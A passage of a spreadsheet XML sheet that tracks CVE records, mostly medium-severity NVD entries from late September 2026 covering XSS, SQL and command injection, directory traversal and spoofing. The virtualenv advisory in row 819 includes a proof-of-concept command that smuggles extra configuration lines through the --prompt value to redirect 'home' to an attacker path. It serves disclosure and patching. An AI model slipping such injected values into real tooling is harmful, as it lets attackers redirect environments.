          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: before 1.46.1.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103049</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103050</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S814" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - MassMessage extension allows Stored XSS.
This issue affects Mediawiki - MassMessage extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103050</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103051</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S815" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - CentralNotice extension allows Stored XSS.
This issue affects Mediawiki - CentralNotice extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103051</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.9 → 6.0)</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71972</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S816" s="5" t="inlineStr">
        <is>
          <t>U-Boot through 2026.10-rc5 contains an out-of-bounds write vulnerability in the video_display_rle8_bitmap function in drivers/video/video_bmp.c. Attackers can supply a crafted RLE8-compressed BMP image to corrupt memory adjacent to the framebuffer and crash the bootloader.</t>
        </is>
      </c>
      <c r="T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71972</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S817" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79534</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr"/>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>mark3labs mcp-filesystem-server v0.11.1 is vulnerable to Directory Traversal due to an improper link resolution in validatePath (filesystemserver/handler/helper.go). When filepath.EvalSymlinks returns os.IsNotExist for a dangling symlink, the fallback validates only the parent directory and returns the unresolved path, so write_file (and modify_file, copy_file, move_file, create_directory) follows a pre-existing dangling symlink located inside an allowed directory and creates a file outside the configured allowed directories.</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79534</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102938</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="inlineStr"/>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M819" s="5" t="inlineStr">
        <is>
          <t>21.7.11</t>
        </is>
      </c>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr"/>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S819" s="5" t="inlineStr">
        <is>
          <t>### Summary
`pyvenv.cfg` is a line-based format with no escape syntax. `PyEnvCfg.write()` wrote values verbatim, while `PyEnvCfg._read_values()` parses the file with `str.splitlines()`. A value containing a line boundary therefore became additional configuration lines, and because reading is last-wins, the injected keys replaced any key written earlier in the file.
### Impact
The `prompt` value is the reachable input: it is set by `--prompt`, by the `VIRTUALENV_PROMPT` environment variable, or from the config file, and `write()` emits `prompt` before `home`. A crafted prompt can therefore set `home` in the generated `pyvenv.cfg`:
```console
$ virtualenv --prompt $'x"\nhome = /attacker/path\nprompt = "z' venv
$ grep '^home' venv/pyvenv.cfg
home = /attacker/path
```
`home` is what tooling reads to locate the base interpreter, so a consumer that trusts it can be pointed elsewhere. `implementation`, `version_info`, `version`, `executable`, `command` and `virtualenv` are also written before `prompt` and can be replaced the same way.
This requires the prompt to come from somewhere other than the person running the command, for example a CI job templating a branch name into it, tooling deriving an environment name from user-supplied data, or an inherited `VIRTUALENV_PROMPT`. Where the operator supplies the prompt directly they already control the command line, and the effect is corruption rather than privilege gain: the value is truncated at the boundary and read back with a dangling quote.
### Details
The boundary set is the one `str.splitlines()` recognizes, which is wider than `\n`: `\r`, `\v`, `\f`, the file, group and record separators, `U+0085`, `U+2028` and `U+2029` were all written through unchanged and all split the line when read back.
### Patches
`PyEnvCfg.write()` now collapses those boundaries to spaces as it serializes each line, so it cannot emit a structurally invalid file regardless of what a caller places in `content`.
### Workarounds
Do not pass externally influenced data as the virtualenv prompt. Strip line boundaries from any value before using it as `--prompt` or `VIRTUALENV_PROMPT`.</t>
        </is>
      </c>
      <c r="T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102938</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102845</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q820" s="5" t="inlineStr"/>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S820" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This issue affects the function error_reporting of the file index.php of the component HTTP Response. The manipulation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T820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102845</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102874</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="inlineStr"/>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q821" s="5" t="inlineStr"/>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S821" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in HKUDS AnyTool 0.1.0. Affected is the function subprocess.run of the file anytool/local_server/main.py of the component Execute Endpoint. The manipulation of the argument command/shell leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102874</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102908</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q822" s="5" t="inlineStr"/>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S822" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Online Reviewer Management System 1.0. This issue affects some unknown processing of the file /reviewer_0/admins/assessments/examproper/questions-view.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102908</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102909</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q823" s="5" t="inlineStr"/>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S823" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/examproper/btn_functions.php. The manipulation of the argument access_code leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102909</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-31027</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q824" s="5" t="inlineStr"/>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S824" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Greek Universities Network (GUnet) Open eClass Platform v.3.15 allows a remote attacker to execute arbitrary code via the last name, first name, and username parameters in the user registration functionality.</t>
        </is>
      </c>
      <c r="T824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-31027</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100822</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q825" s="5" t="inlineStr"/>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S825" s="5" t="inlineStr">
        <is>
          <t>Spoofing issue in the Networking: HTTP component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 153.4, and Firefox 157.</t>
        </is>
      </c>
      <c r="T825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100822</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100823</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q826" s="5" t="inlineStr"/>
      <c r="R826" s="5" t="inlineStr"/>
      <c r="S826" s="5" t="inlineStr">
        <is>
          <t>Spoofing issue in the Downloads component in Firefox for Android. This vulnerability was fixed in Firefox 157.</t>
        </is>
      </c>
      <c r="T826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100823</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93332</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="inlineStr"/>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q827" s="5" t="inlineStr"/>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S827" s="5" t="inlineStr">
        <is>
          <t>Improper access control in the partial connection API in Devolutions Server 2026.3.5.0 and earlier allows an authenticated low-privileged user to read, create, modify, and delete System Vault entries via a crafted API request.</t>
        </is>
      </c>
      <c r="T827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93332</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95287</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K828" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q828" s="5" t="inlineStr"/>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S828" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Navigation in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95287</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
